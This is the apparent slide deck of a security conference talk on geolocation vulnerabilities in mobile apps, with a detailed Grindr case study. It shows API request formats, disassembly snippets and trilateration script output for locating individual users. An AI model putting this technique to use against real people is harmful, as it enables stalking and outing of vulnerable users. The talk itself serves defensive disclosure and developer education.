@colbymoore
“sources a global contingent of vetted security experts worldwide and pays them on an incentivized basis to discover security vulnerabilities in our customers’ web apps, mobile apps, and infrastructure endpoints.”
ABOUT
always looking for more experts!
@colbymoore/VRL /SYNACK
vetted researchers
internal R&D
backed by google
geolocation bugs, hacks, & fixesAN OUTLINE
all things geo case study fixes/conclusions} }code bugs
lots of bugs
tracking users
ALL THINGS GEOoverview, code, & bugs
incorporating geolocation is the normGEOLOCATION IN MOBILE APPS
74% of smart phone users get info based on their phone’s current location
Use Geo
No Geo
social
recommendationstracking
health & fitness
commerce
navigation
“84% inquire about location”
HOW IS GEOLOCATION ACCOMPLISHED (IOS)?
create delegate start
“The CLLocationManager class is the central point for configuring the delivery of location-related events to your app.” apple.com
wait/handle
using the Core Location Manager
‘doing it’ in SwiftGEOLOCATION (IOS)
//required framework import CoreLocation
//conform to CLLocationManagerDelegate class ViewController: UIViewController, CLLocationManagerDelegate {
//[1] CREATE (instance of) location manager let locationManager = CLLocationManager()
//app delegate function override func viewDidLoad() {
//[2] set DELEGATE self.locationManager.delegate = self; //request auth self.locationManager.requestWhenInUseAuthorization() //[3] START collecting location self.locationManager.startUpdatingLocation()
}
//[4] WAIT/HANDLE, delegate (callback) function func locationManager(manager: CLLocationManager!, didUpdateLocations locations: [AnyObject]!) { //do whateverz // -‐>user’s location is in manager.location.coordinate.(longitude/latitude)
} }
os-level alertsGEOLOCATION (I)OS LEVEL PROTECTIONS
NSLocationWhenInUseUsageDescription:
//request auth for foreground self.locationManager.requestWhenInUseAuthorization()
App’s Info.plist
iOS alertcode for auth request
“allow the app to get location updates only when the app is in the foreground”
os-level alertsGEOLOCATION (I)OS LEVEL PROTECTIONS
//request auth for foreground self.locationManager.requestAlwaysAuthorization()
App’s Info.plist
iOS alertcode for auth request
“allows the app to receive location updates both when the app is in the foreground and in the background (suspended or terminated)”
NSLocationAlwaysUsageDescription:
…bad for users!GEO CAN ‘LEAK’ IF THE APPLICATION IS BUGGY
“the government”hackers
“spies could be lurking to snatch data revealing the [app] player’s location”
-nytimes.com
thieves
criminals
…so what!?THEY KNOW YOUR LOCATION
“investigators said the suspects used social networking sites such as Facebook to identify victims who posted online that they would not be home at a certain time” -thieves robbed homes based on facebook [3]
“a [geo]location allows perpetrators the perfect window to commit a burglary, vandalism, or even a home invasion” -criminal use of social media [2]
“[geolocation] generates a precise, comprehensive record of a person’s public movements that reflects a wealth of detail about her familial, political, professional, religious, and sexual associations” -u.s. v. jones [1]
1) http://scholarship.kentlaw.iit.edu/cgi/viewcontent.cgi?article=3332&context=fac_schol 2) http://www.nw3c.org/docs/whitepapers/criminal-use-of-social-media.pdf3) http://www.wmur.com/Police-Thieves-Robbed-Homes-Based-On-Facebook-Social-Media-Sites/11861116
can compromise a user’s physical locationCOMMON CLASSES OF GEO BUGZ
insecure network comms
insecure local storage
location spoofing
buggy server-side APIs
overly precise location
UI errors/validation
may allow passive attackers access to geoINSECURE NETWORK COMMS
insecure network comms
use unencrypted comms
allow self-signed certificates
forget to pin certificates
do not do these things!
find such bugs with a proxyINSECURE NETWORK COMMS
https:// https:// http://
proxy (burp) config
device config
does the app accept self-signed certificates?INSECURE NETWORK COMMS
MOVT R8, #(:upper16:(classRef_NSURLRequest -‐ 0xC254)) ADD R8, PC ; classRef_NSURLRequest
MOV R2, #(selRef_setAllowsAnyHTTPSCertificate_forHost_ -‐ 0xC2A4) ADD R2, PC LDR R4, [R2] ;"setAllowsAnyHTTPSCertificate:forHost:"
LDR R5, [R8] ;_OBJC_CLASS_$_NSURLRequest
MOV R0, R5 ;_OBJC_CLASS_$_NSURLRequest MOV R1, R4 ;"setAllowsAnyHTTPSCertificate:forHost:" MOVS R2, #1 ;’YES’ MOV R3, R8 ; the host BLX _objc_msgSend
class
method
allowing a self-signed certificate (iOS) setAllowsAnyHTTPSCertificate:forHost:
invoke method
did the app forget to pin certificates?INSECURE NETWORK COMMS
non-jailbroken device
+
hacker’s cert
can MitM the connection
“SSL pinning is a extra layer of security that ensures a client will only communicate with a well-defined set of servers”
stolen or lost phones may compromise user’s geoINSECURE LOCAL STORAGE
insecure local storage
store in unencrypted files
again, bad!
}plists logfilesdatabases
find such bugs with filemon & fileDPINSECURE LOCAL STORAGE
//dump file attributes NSLog(@"attrs: %@", [[[NSFileManager defaultManager] attributesOfItemAtPath:path error:nil] objectForKey:NSFileProtectionKey]);
display file’s protection attributes (iOS)
# ./filemon
Wheres_Waldo Created /Application Support/analytics/location.db-‐journal DEV: 1,3 INODE: 121171 MODE: 81a4 UID: 501 GID: 501 Arg64: 300649589561
Wheres_Waldo Renamed /Preferences/lastKnownLocation.plist.l0mitdo DEV: 1,3 INODE: 121172 MODE: 8180 UID: 501 GID: 501
monitoring app’s file I/O
on iOS, always check the user’s default plistINSECURE LOCAL STORAGE
MOV R1, #(selRef_standardUserDefaults-‐0x5917A) ADD R1, PC LDR R1, [R1] ;"standardUserDefaults"
MOV R0, #(classRef_NSUserDefaults-‐0x591A2) ADD R0, PC LDR R0, [R0] ;_OBJC_CLASS_$_NSUserDefaults
BLX _objc_msgSend ;[NSUserDefaults standardUserDefaults]
MOV R3, #(cfstr_geoInfo-‐0x591D6) ADD R3, PC ;"geoInfo"
LDR R2, [SP,#0xB4+usersGeo] ;geo data
MOV R1, #(selRef_setObject_forKey_-‐0x591D6) ADD R1, PC LDR R1, [R1] ;"setObject:forKey:"
BLX _objc_msgSend ;[userDefaults setObject: forKey:]
app’s /Library/Preferences/with NSFileProtectionNone
App’s IDA disassemblyApp’s ‘User Defaults’ plist
<dict> <key>geoInfo</key> <dict> <key>homeLong</key> <real>73.242539</real> <key>homeLat</key> <real>34.169308</real> ... </dict> </dict>
don’t trust geolocation from the clientLOCATION SPOOFING
location spoofing
be careful if you do this!
explicitly trust client-side geo
allow client’s (device’s) location to rapidly change
}user auth
access to ‘relative’ data
find such bugs by manipulating reported geoLOCATION SPOOFING
edit to spoof geo!
editing network dataz
cycript (runtime manipulations)
location spoofing apps (from Cydia)
or
do apps really need precision to 12 decimal places?! OVER PRECISE LOCATION
over precise location
treat with care!
collect geolocation as precise as possible
long: 73.242539906632…
~1km ~1m ~1mm
don’t specify a ‘desired accuracy’ (iOS defaults to highest)
sniffing (network or file I/O) or look at disassemblyOVER PRECISE LOCATION
//create instance of location manager let locationManager = CLLocationManager()
//set ‘desired accuracy’ locationManager.desiredAccuracy = kCLLocationAccuracyBest;
MOV R4, #(_kCLLocationAccuracyBest_ptr -‐ 0xACD8) ADD R4, PC, R4 ; _kCLLocationAccuracyBest_ptr LDR R4, [R4] ; _kCLLocationAccuracyBest VLDR D16, [R4] VMOV R2, R3, D16 ; R2 contains _kCLLocationAccuracyBest
LDR R1, [SP,#0xF8+selRef_setDesiredAccuracy] LDR R1, [R1] ; R1 contains selRef_setDesiredAccuracy ;R0 has locationManager object LDR R9, [SP,#0xF8+objc_msgSend] ; __imp__objc_msgSend
; objc_msgSend(locationManager, “setDesiredAccuracy”, _kCLLocationAccuracyBest); BLX R9
IDA disassembly
setting ‘desired accuracy'
unprotected APIs may provide geoINSECURE SERVER-SIDE APIS
insecure server-side APIs
assume undocumented APIs are hidden
allow unlimited (un-throttled) queries
provide unrestricted geo
all bad assumptions/ideas!
allow unauthorized queries
sniffing network traffic often reveals undocumented APIINSECURE SERVER-SIDE APIS
holy $#!@, did we just find Carmen Sandiego!? ;)
intercepted outgoing request modified request
changed user
what lurks below?USER-INTERFACE
user interface
assume the UI is ‘secure’
implement client-side protection (in the UI)
all bad assumptions/ideas!
ignore user settings
don’t enforce anything at the UI levelUSER INTERFACE
OR }ui settings ignored!
ui level logic (e.g. precision rounding)
client location still sent to server
precise geolocation (of other users) sent to device
buggy apps that compromised a user’s physical locationEXAMPLE OF GEO BUGS
starbucks whisper
angry birds
grindr
tinder
case-study
overpriced coffee, plus a shot of geo tracking STARBUCKS
[CVE-2014-0647] Insecure Data Storage of User Data in Starbucks v2.6.1 iOS mobile application (Daniel Wood)
/Library/Caches/com.crashlytics.data/com.starbucks.mystarbucks/session.clslog
“[unencrypted] geolocation data included alongside username and password data, meaning that hackers can potentially see where a user most often traveled if they
were to access the phone”
“the safest place on the internet” - NOPEWHISPER
users monitored/tracked (even if opt’d out)
geo stored ‘indefinitely’
shared with the DOD
“”Revealed: how Whisper app tracks ‘anonymous’ users” -the guardian
precise geo of nearby users, allowed trackingTINDER
tinder user trilateration (blog.includesecurity.com)
main_photo_url = photos[0]['url']
matches
‘tinderizer’
facebook profiles
…‘they’ are watching you playANGRY BIRDS
“the ABC have been developing capabilities to take advantage of "leaky" smartphone apps, such as the wildly popular Angry Birds game, that transmit users' private information [geo]” -the guardian
Case Study - Grindr many, many #$&@ up’s
(all-male) social-dating appWHAT’S GRINDR?
“the largest and most popular all-male location-based social network out there. more than 5 million guys in 192 countries around the world -- and approximately 10,000 more new users downloading the app every day” -grindr.com
all about geo
extremely popular
targeted group
Those who cannot learn from history are doomed to repeat itGRINDR’S PREVIOUS ISSUES
2012: “Love online: 100,000 Grindr users exposed in hack attack” -sydney morning herald
2013: Grindr Application Security Evaluation Report -university of amsterdam
2014: “Grindr fails to protect user's”-anonymous (pastebin)
2014: Grindr Application Analysis -synack
“0 Feet Away”GRINDR (CASE STUDY)
lack of SSL pinning
overly precise geo
location spoofing
overly permissible APIs
broken ui level logic sharing geoclient side precision
yes, so much wrong!
the app does not pin its certsBUG 0X1: LACK OF SSL PINNING
login info
user geolocation
the app reported (overly) precise relative distancesBUG 0X2: REPORTING OF PRECISE GEO
primus.grindr.com POST /2.0/nearbyProfiles
{"status": 1, "distance": 3.861290174942267, "relationshipStatus": 1, "displayName": "Waldo", "isFavorite": false, "showDistance": true, "height": 187.960006713867,"profileId": 12345678, …}
response
3.861290174942267 km away
even newer versions may reveal precise locationBUG 0X2: REPORTING OF PRECISE GEO
//create instance of location manager let locationManager = CLLocationManager()
//set ‘desired accuracy’ locationManager.desiredAccuracy = kCLLocationAccuracyNearestTenMeters;
10 meter
location reporting
office
can spoof your location…as much as you wantBUG 0X3: LOCATION SPOOFING
geolocation coordinates for locating ‘nearby’ users
change these at will!
trilateration?
unauthenticated, unlimited access to APIsBUG 0X4: WIDE-OPEN APIS
{ "filter":{ "page":1, "quantity":50 }, "lat":<any lat>, "lon":<any lon> }
primus.grindr.com POST /2.0/nearbyProfiles
name height weight relative distance
request for users’ infouser info
what you see/say isn’t what you getBUG 0X5: ‘BROKEN’ UI LEVEL LOGIC
OR }if !showDistance {
hide distance }
+ settings
+ settings
UI level logicsrsly? wtf!
our goal was to help Grindr under the issuesDISCLAIMER
during vulnerability research and disclosure no individual users were intentionally or unintentionally identified
all data logged has been irrecoverably destroyed.
The purpose of this research was not to identify Grindr users but to help protect those that wish to remain private.
combining bugs can lead “total tracking”IT'S MORPHIN' TIME
wide-open APIs
precise relative geo
location spoofing
+
+
=
tracking of any user anywhere!
query the APIs to get info about all ‘nearby’ usersCOLLECTION DATAZ
$ python collectInfo.py -‐o output.json [+] sent request to: primus.grindr.com POST /2.0/nearbyProfiles [+] saving response (50 users)
$ less output.json "profiles": [{ "profileId": 314159265, "displayName": "Waldo", "aboutMe": "Where am I?", "distance": 0.4980983433684 }, ...
request
response
determine absolute location from relative distances TRILATERATION
“trilateration is the process of determining absolute locations by measurement of (relative) distances, using the geometry of circles, spheres or triangles.”
$ python findUser.py -‐i 314159265 [+] making query 1, 2, 3 got three relative distances[+] converting geodetic lat/long to ECEF[+] transforming
circle 1 at origin, circle 2 on x axis, etc [+] generating array with ECEF x,y,z [+] converting ECEF back to lat/long
[+] user is at: 73.242539906632, 34.169308121551
trilateration script
so lets map some usersUSER LOCATION
San Francisco
Sochi (olympics)
stores
capitols
so lets track some willing usersUSER TRACKING
your life; revealed
it’d be trivial to reveal anonymous user’s identitiesIDENTIFYING USERS
picture
geo tracking
from profile name
home work } revealed!
…didn’t care :/ REPORTING TO GRINDR
early 2014 - initial disclosure to vendor
followups included conference calls, technical write-ups, & POCs
didn’t fix anything
“we do not view this as a security flaw” -grindr.com/blog/grindr-security
…sadly it came to this to get (some) fixesCAT GOT OUT OF THE BAG
“Egyptian officials have resorted to using location-based dating app Grindr to arrest gay men"
“Grindr fails to protect their user’s” -anonymous (pastebin) people’s lives affected :(
fixes & current issuesGRINDR RESPONSE
}user’s settings respected
geofencing (in Egypt, etc.)
geolocation kCLLocationAccuracyNearestTenMeters
}no SSL pinning open APIs spoofing
still can track most users!
no rate limiting
Fixes/Conclusions for users and devs alike
for users and app developers alikeBEST PRACTICES
assume you can be tracked
disallow tracking at the OS level
user
developer
secure comms
secure local storage
protected APIs
non-precise geo
correct UI logic
}
where’s waldo?!
QUESTIONS & ANSWERS
@colbymoore
syn.ac/appSecCaGeo
…feel free to contact us any time!
credits
- thezooom.com - deviantart.com (FreshFarhan) - nicolevanputten.com - http://agentfox.deviantart.com/art/chuck-Norris-hunting-waldo-42939561 - http://fc09.deviantart.net/fs70/f/2010/154/3/9/Waldo_by_MattMelvin.jpg - http://th05.deviantart.net/fs71/PRE/i/2013/250/c/c/where_s_waldo_by_katanauser98-d6lgepy.png
- iconmonstr.com - flaticon.com
images